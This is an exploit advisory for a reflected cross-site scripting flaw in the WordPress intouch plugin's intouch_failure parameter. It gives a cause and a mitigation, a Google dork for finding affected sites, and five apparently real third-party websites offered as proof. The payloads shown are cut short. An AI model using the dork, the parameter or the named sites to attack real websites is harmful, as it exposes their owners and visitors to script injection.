######################
# Exploit Title : WordPress intouch Plugin Cross-Site Scripting Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/intouch/
# Google Dork : inurl:/wp-content/plugins/intouch/
# Date : 2013/01/01
# Tested on : Windows 8 , Linux
# Version : 2.0
# Software Link : http://downloads.wordpress.org/plugin/intouch.zip
######################
# Exploit : Cross-Site Scripting (reflected through a GET parameter)
# Location : http://[Target]/wp-content/plugins/intouch/intouch.js.php?intouch_failure=[XSS]
# Cause : the value of the intouch_failure query parameter appears to be written into the response of intouch.js.php without output encoding.
# Mitigation : encode intouch_failure for its output context (HTML / JavaScript) before it is written to the response; on sites still running the affected version, disable the plugin or filter requests to intouch.js.php that carry this parameter.
#
# Proof:
# http://tresx4.net/esp/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/>
#
# http://www.maltagop.net/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/>
#
# http://www.sercongal.com/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/>
#
# http://www.day-trading-mind.com/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/>
#
# http://www.tauntoneasterrun.co.uk/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/>
######################
# Discovered by : Spoof
######################